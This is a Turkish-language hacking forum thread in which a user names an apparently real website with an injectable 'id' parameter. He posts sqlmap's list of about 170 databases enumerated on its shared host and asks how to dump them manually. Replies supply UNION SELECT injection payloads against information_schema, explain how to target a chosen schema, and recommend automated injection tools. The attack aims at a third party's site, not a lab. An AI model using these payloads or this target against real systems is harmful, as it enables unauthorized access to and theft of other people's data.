Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
SQL Injection Hk. (?)
#1
Selamün Aleyküm dostlar,
SQL Injection ile ilgili bi' soru soracağım, anlayamadım pek. Direkt gireyim konuya... Manuel SQL Injection ile "information_schema" haricinde database dump edebilir miyim ? Sqlmap gösteriyor, ama manuel olarak yapamadım. Yardımcı olursanız sevinirim. Hatta siteyi de vereyim:
Kod:
http://kazenotairiku.sandwich.net/en/showimg.php?id=11
SQLMap'in verdiği vuln. databaseler ;
Kod:
[*] 7seas
[*] 7seas_forum
[*] agonyforum
[*] amuszalski
[*] anderocci
[*] anopenhand
[*] arsenal
[*] bharris
[*] bharris_dab
[*] blipclinic_wp
[*] blssba_event
[*] blssba_forum
[*] blssba_help
[*] blssba_newsoffice
[*] bob913
[*] chammers
[*] chammers_codex
[*] daisukeaurora
[*] debugger
[*] destiny
[*] dorothyt
[*] dorothyt_wp
[*] dothack
[*] dothack_redacted
[*] dragfyre
[*] dreol
[*] dwa
[*] eidenyaku
[*] esterior_wiki
[*] esterior_wp
[*] fnord_fenspace
[*] fugli
[*] gworg
[*] hadar_magento
[*] hakker
[*] hours
[*] iffmb
[*] iffmb_phpbb
[*] illyria
[*] illyria_anob
[*] illyria_art
[*] illyria_art2
[*] illyria_artsch
[*] illyria_ath
[*] illyria_ath_art
[*] illyria_blog
[*] illyria_bsad
[*] illyria_complus
[*] illyria_fanfic
[*] illyria_gif
[*] illyria_glee
[*] illyria_hprpg
[*] illyria_hprpg2
[*] illyria_joss
[*] illyria_khbeta
[*] illyria_mt
[*] illyria_nigel
[*] illyria_nuke
[*] illyria_phd
[*] illyria_phpbb
[*] illyria_poll_test
[*] illyria_redshirts
[*] illyria_research
[*] illyria_rpg
[*] illyria_rphub
[*] illyria_rshirts
[*] illyria_whittier
[*] illyria_wp
[*] illyria_xwiki
[*] information_schema
[*] inframode
[*] jihad_mt
[*] jihad_phpbb
[*] joehauser
[*] justinian
[*] katster
[*] kelsea
[*] kelsea_blesta
[*] kphoebe
[*] lowrance
[*] lpayzant_cmp
[*] lpayzant_leps
[*] melreese
[*] mesougly
[*] milang
[*] millenia
[*] minient
[*] mint
[*] mint_forum
[*] mint_jam
[*] mlink
[*] mysql
[*] natureday
[*] natureday_idev
[*] naturewhite
[*] neighbor
[*] neighbor_phpbb
[*] nickm
[*] nyspv
[*] omgfloofy
[*] orparkour
[*] pcc_wp
[*] performance_schema
[*] phpmyadmin
[*] pma66p
[*] pnwpa
[*] primis
[*] primis_b2evo
[*] primis_phpbb
[*] quiltdaze
[*] quiltingjoy
[*] rekishi
[*] renkenlaw
[*] roundcube
[*] rtchen2001
[*] russian
[*] russian_crm
[*] russian_philex
[*] russianem
[*] russiantemp
[*] sacnano
[*] schnee
[*] shadrad_oekaki
[*] shirts4kids
[*] shirts4kids_wp
[*] sugarhigh
[*] suiko
[*] suiko_phpbb
[*] suikox
[*] suikox_gallery2
[*] suikox_nuke
[*] suikox_phpbb
[*] suikox_phpfn
[*] suikox_pma
[*] suikox_v2
[*] suikox_webring
[*] tenkan
[*] test
[*] tetsugyu
[*] tetsugyu_lawl
[*] tetsugyu_mcf
[*] tetsugyu_npr
[*] theremina
[*] trishalynn_geek
[*] trishalynn_lps
[*] trishalynn_saucy
[*] tyson
[*] vdgsa_access
[*] vdgsa_conclave
[*] vdgsa_grants
[*] vdgsa_members
[*] vdgsa_newmusic
[*] vdgsa_rentals
[*] vdgsa_resourcespace
[*] vdgsa_search
[*] vdgsa_test
[*] vdgsa_viols
[*] vorfeed
[*] wcklegal
[*] westwoodboard
[*] yurilev
Teşekkürler.
Beğenenler:
#2
" .php?id=1+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+where+table_schema=database " ile çekebilirsin de yorma kardeşim havij, web cruiser , jSQL injection, pangolin vb. program işini kolaylaştırır.
Beğenenler:
#3
(31-10-2014, Saat: 23:24)mifsad Adlı Kullanıcıdan Alıntı: " .php?id=1+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+where+table_schema=database " ile çekebilirsin de yorma kardeşim havij, web cruiser , jSQL injection, pangolin vb. program işini kolaylaştırır.

Ya kolaylaşmasına kolay da, en azından ne yaptığımı bileyim, kavrayayım istiyorum. Senin o yaptığın da zaten information_schema'daki tabloları çekmek, ben onu yapıyorum zaten : )
Beğenenler:
#4
sonundaki database yerine veritabanı ismini yazarsan yazdığın veritabanındaki tabloları alırsın
Beğenenler: ERMİŞ
#5
yaw beyler sizi anlamıyorum vallahi yaa " havij " denen bi nimet var elinizde nie kendinizi yoruyosunuz manuel ile yazık değil mi kiss
Beğenenler:
#6
Havij otomatik yapıyor, ne yaptığımı bilmeden program kullanmak istemiyorum : ) Şunu bi öğreneyim ondan sonra yine kullanırım jsql,sqlmap falan.

(01-11-2014, Saat: 12:36)mifsad Adlı Kullanıcıdan Alıntı: sonundaki database yerine veritabanı ismini yazarsan yazdığın veritabanındaki tabloları alırsın
Biliyorum. Benim çekmek istediğim information_schema'daki tablolar değil.
Beğenenler:
#7
information_schema da veri tabanı isimleri saklanır

Ör;+from+information_schema.tables+where+table_schema='cyberizm' ile "cyberizm" adlı veritabanındaki tablolar listelenir.
Beğenenler:

Anahtar Kelimeler

SQL Injection Hk. (?) indir, SQL Injection Hk. (?) Videosu, SQL Injection Hk. (?) Online izle, SQL Injection Hk. (?) Bedava indir, SQL Injection Hk. (?) Yükle, SQL Injection Hk. (?) Hakkında, SQL Injection Hk. (?) Nedir, SQL Injection Hk. (?) Free indir, SQL Injection Hk. (?) Oyunu, SQL Injection Hk. (?) Download


1 Ziyaretçi